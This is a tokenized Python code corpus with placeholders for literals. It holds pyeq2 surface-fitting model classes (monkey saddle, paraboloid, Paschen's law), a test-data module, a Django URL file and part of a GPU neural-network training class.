independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> PowY_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY_4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> PowX_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> try : <EOL> temp = a * PowY_4 + b * PowY_2 * x_in - c * PowX_2 <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MonkeySaddleA ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> PowX_3 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = a * PowX_3 - b * x_in * PowY_2 <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MonkeySaddleB ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> PowY_3 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowX_2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = a * PowY_3 - b * y_in * PowX_2 <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MonkeySaddle_TransformA ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:f>' , '<STR_LIT:g>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> d = inCoeffs [ <NUM_LIT:3> ] <EOL> f = inCoeffs [ <NUM_LIT:4> ] <EOL> g = inCoeffs [ <NUM_LIT:5> ] <EOL> try : <EOL> temp = a * numpy . power ( c * x_in + d , <NUM_LIT> ) - b * ( c * x_in + d ) * numpy . square ( f * y_in + g ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class MonkeySaddle_TransformB ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:f>' , '<STR_LIT:g>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> d = inCoeffs [ <NUM_LIT:3> ] <EOL> f = inCoeffs [ <NUM_LIT:4> ] <EOL> g = inCoeffs [ <NUM_LIT:5> ] <EOL> try : <EOL> temp = a * numpy . power ( c * y_in + d , <NUM_LIT> ) - b * ( c * y_in + d ) * numpy . square ( f * x_in + g ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class Paraboloid ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> try : <EOL> temp = a * XSQPLUSYSQ <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class Paraboloid_Transform ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:f>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> d = inCoeffs [ <NUM_LIT:3> ] <EOL> f = inCoeffs [ <NUM_LIT:4> ] <EOL> try : <EOL> temp = a * ( numpy . square ( b * x_in + c ) + numpy . square ( d * y_in + f ) ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class PaschensBreakdownFieldStrengthLaw ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = True <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = True <EOL> independentData2CannotContainZeroFlag = True <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = True <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . LogXY ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> LogXY = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = x_in * ( a / ( LogXY + b ) ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class PaschensBreakdownVoltageLaw ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = True <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = True <EOL> independentData2CannotContainZeroFlag = True <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = True <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XY ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . LogXY ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XY = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> LogXY = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = ( a * XY ) / ( LogXY + b ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import absolute_import <EOL> asciiDataInFourColumns_small = '''<STR_LIT>''' <EOL> asciiIntegerDataInColumns = '''<STR_LIT>''' <EOL> asciiDataInFourColumns = '''<STR_LIT>''' <EOL> asciiDataInColumns_2D = '''<STR_LIT>''' <EOL> asciiDataInColumns_3D = '''<STR_LIT>''' <EOL> asciiDataInColumns_2D_small = '''<STR_LIT>''' <EOL> asciiDataInColumns_3D_small = '''<STR_LIT>''' <EOL> asciiDataForExponentialSensitivityTest = '''<STR_LIT>''' </s>
<s> from django . conf . urls import patterns , url <EOL> from django . views . generic . base import TemplateView <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , TemplateView . as_view ( template_name = "<STR_LIT>" ) ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import numpy as n <EOL> import os <EOL> from time import time , asctime , localtime , strftime <EOL> from numpy . random import randn , rand <EOL> from numpy import s_ , dot , tile , zeros , ones , zeros_like , array , ones_like <EOL> from util import * <EOL> from data import * <EOL> from options import * <EOL> from math import ceil , floor , sqrt <EOL> from data import DataProvider , dp_types <EOL> import sys <EOL> import shutil <EOL> import platform <EOL> from os import linesep as NL <EOL> class ModelStateException ( Exception ) : <EOL> pass <EOL> class IGPUModel : <EOL> def __init__ ( self , model_name , op , load_dic , filename_options = None , dp_params = { } ) : <EOL> self . model_name = model_name <EOL> self . op = op <EOL> self . options = op . options <EOL> self . load_dic = load_dic <EOL> self . filename_options = filename_options <EOL> self . dp_params = dp_params <EOL> self . get_gpus ( ) <EOL> self . fill_excused_options ( ) <EOL> self . img_size = <NUM_LIT:32> <EOL> self . img_channels = <NUM_LIT:3> <EOL> self . img_rs = <NUM_LIT:0> <EOL> for o in op . get_options_list ( ) : <EOL> setattr ( self , o . name , o . value ) <EOL> if load_dic : <EOL> self . model_state = load_dic [ "<STR_LIT>" ] <EOL> self . save_file = self . options [ "<STR_LIT>" ] . value <EOL> if not os . path . isdir ( self . save_file ) : <EOL> self . save_file = os . path . dirname ( self . save_file ) <EOL> ( pdir , self . save_file ) = os . path . split ( self . save_file ) <EOL> if ( len ( self . save_file ) == <NUM_LIT:0> ) : <EOL> ( pdir , self . save_file ) = os . path . split ( pdir ) <EOL> if ( os . path . samefile ( pdir , self . save_path ) ) : <EOL> print "<STR_LIT>" , pdir <EOL> print "<STR_LIT>" , self . save_path <EOL> else : <EOL> self . model_state = { } <EOL> if self . model_file : <EOL> self . save_file = self . model_file <EOL> else : <EOL> if filename_options is not None : <EOL> self . save_file = model_name + "<STR_LIT:_>" + '<STR_LIT:_>' . join ( [ '<STR_LIT>' % ( char , self . options [ opt ] . get_str_value ( ) ) for opt , char in filename_options ] ) + '<STR_LIT:_>' + strftime ( '<STR_LIT>' ) <EOL> self . model_state [ "<STR_LIT>" ] = [ ] <EOL> self . model_state [ "<STR_LIT>" ] = [ ] <EOL> self . model_state [ "<STR_LIT>" ] = <NUM_LIT:1> <EOL> self . model_state [ "<STR_LIT>" ] = self . train_batch_range [ <NUM_LIT:0> ] <EOL> self . init_data_providers ( ) <EOL> if load_dic : <EOL> self . train_data_provider . advance_batch ( ) <EOL> try : <EOL> self . init_model_state ( ) <EOL> except ModelStateException , e : <EOL> print e <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> for var , val in self . model_state . iteritems ( ) : <EOL> setattr ( self , var , val ) <EOL> self . import_model ( ) <EOL> self . init_model_lib ( ) <EOL> def import_model ( self ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % ( '<STR_LIT:_>' + self . model_name ) <EOL> self . libmodel = __import__ ( '<STR_LIT:_>' + self . model_name ) <EOL> def fill_excused_options ( self ) : <EOL> pass <EOL> def init_data_providers ( self ) : <EOL> self . dp_params [ '<STR_LIT>' ] = self <EOL> try : <EOL> self . test_data_provider = DataProvider . get_instance ( <EOL> self . data_path , <EOL> self . img_size , self . img_channels , <EOL> self . test_batch_range , <EOL> type = self . dp_type , dp_params = self . dp_params , test = True ) <EOL> self . train_data_provider = DataProvider . get_instance ( <EOL> self . data_path , <EOL> self . img_size , self . img_channels , <EOL> self . train_batch_range , <EOL> self . model_state [ "<STR_LIT>" ] , self . model_state [ "<STR_LIT>" ] , <EOL> type = self . dp_type , dp_params = self . dp_params , test = False ) <EOL> except DataProviderException , e : <EOL> print "<STR_LIT>" % e <EOL> self . print_data_providers ( ) <EOL> sys . exit ( ) <EOL> def init_model_state ( self ) : <EOL> pass <EOL> def init_model_lib ( self ) : <EOL> pass <EOL> def start ( self ) : <EOL> if self . test_only : <EOL> self . test_outputs += [ self . get_test_error ( ) ] <EOL> self . print_test_results ( ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> self . train ( ) <EOL> def scale_learningRate ( self , eps ) : <EOL> self . libmodel . scaleModelEps ( eps ) ; <EOL> def reset_modelMom ( self ) : <EOL> self . libmodel . resetModelMom ( ) ; <EOL> def train ( self ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" , self . scale_rate <EOL> print "<STR_LIT>" , self . reset_mom <EOL> print "<STR_LIT>" , self . img_rs <EOL> print "<STR_LIT>" <EOL> self . scale_learningRate ( self . scale_rate ) <EOL> if self . reset_mom : <EOL> self . reset_modelMom ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % self . model_name <EOL> self . op . print_values ( ) <EOL> print "<STR_LIT>" <EOL> self . print_model_state ( ) <EOL> print "<STR_LIT>" % "<STR_LIT:U+002CU+0020>" . join ( "<STR_LIT>" % d for d in self . device_ids ) <EOL> print "<STR_LIT>" % asctime ( localtime ( ) ) <EOL> print "<STR_LIT>" % os . path . join ( self . save_path , self . save_file ) <EOL> print "<STR_LIT>" <EOL> next_data = self . get_next_batch ( ) <EOL> if self . adp_drop : <EOL> dropRate = <NUM_LIT:0.0> <EOL> self . set_dropRate ( dropRate ) ; <EOL> epoch_cost = <NUM_LIT:0> <EOL> print_epoch_cost = False <EOL> while self . epoch <= self . num_epochs : <EOL> data = next_data <EOL> self . epoch , self . batchnum = data [ <NUM_LIT:0> ] , data [ <NUM_LIT:1> ] <EOL> if self . batchnum == <NUM_LIT:1> : <EOL> if print_epoch_cost : <EOL> print "<STR_LIT>" + str ( epoch_cost ) <EOL> epoch_cost = <NUM_LIT:0> <EOL> print_epoch_cost = True <EOL> self . print_iteration ( ) <EOL> sys . stdout . flush ( ) <EOL> if self . batchnum == <NUM_LIT:1> and self . adp_drop : <EOL> dropRate = self . adjust_dropRate ( dropRate ) <EOL> compute_time_py = time ( ) <EOL> self . start_batch ( data ) <EOL> next_data = self . get_next_batch ( ) <EOL> batch_output = self . finish_batch ( ) <EOL> self . train_outputs += [ batch_output ] <EOL> epoch_cost += self . print_train_results ( ) <EOL> if self . get_num_batches_done ( ) % self . testing_freq == <NUM_LIT:0> : <EOL> self . sync_with_host ( ) <EOL> self . test_outputs += [ self . get_test_error ( ) ] <EOL> self . print_test_results ( ) <EOL> self . print_test_status ( ) <EOL> self . conditional_save ( ) <EOL> self . print_train_time ( time ( ) - compute_time_py ) <EOL> self . cleanup ( ) <EOL> def cleanup ( self ) : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def set_dropRate ( self , dropRate ) : <EOL> print "<STR_LIT>" , dropRate <EOL> self . libmodel . setDropRate ( dropRate ) ; <EOL> def adjust_dropRate ( self , dropRate ) : <EOL> if not self . train_outputs : <EOL> return dropRate <EOL> costs , num_cases = self . train_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] , self . train_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> for errname in costs . keys ( ) : <EOL> if costs [ errname ] [ <NUM_LIT:1> ] < ( <NUM_LIT:1> - dropRate ) : <EOL> dropRate += <NUM_LIT:0.1> <EOL> self . set_dropRate ( dropRate ) <EOL> return dropRate <EOL> def sync_with_host ( self ) : <EOL> self . libmodel . syncWithHost ( ) <EOL> def print_model_state ( self ) : <EOL> pass <EOL> def get_num_batches_done ( self ) : <EOL> return len ( self . train_batch_range ) * ( self . epoch - <NUM_LIT:1> ) + self . batchnum - self . train_batch_range [ <NUM_LIT:0> ] + <NUM_LIT:1> <EOL> def get_next_batch ( self , train = True ) : <EOL> dp = self . train_data_provider <EOL> if not train : <EOL> dp = self . test_data_provider <EOL> data = self . parse_batch_data ( dp . get_next_batch ( ) , train = train ) <EOL> w = dp . get_out_img_size ( ) <EOL> h = dp . get_out_img_size ( ) <EOL> d = dp . get_out_img_depth ( ) <EOL> if self . img_rs and train : <EOL> assert ( w * h * d == data [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] ) <EOL> self . libmodel . preprocess ( [ data [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] ] , w , h , d , <NUM_LIT> , <NUM_LIT:15> ) <EOL> return data <EOL> def parse_batch_data ( self , batch_data , train = True ) : <EOL> return batch_data [ <NUM_LIT:0> ] , batch_data [ <NUM_LIT:1> ] , batch_data [ <NUM_LIT:2> ] [ '<STR_LIT:data>' ] <EOL> def start_batch ( self , batch_data , train = True ) : <EOL> self . libmodel . startBatch ( batch_data [ <NUM_LIT:2> ] , not train ) <EOL> def finish_batch ( self ) : <EOL> return self . libmodel . finishBatch ( ) <EOL> def 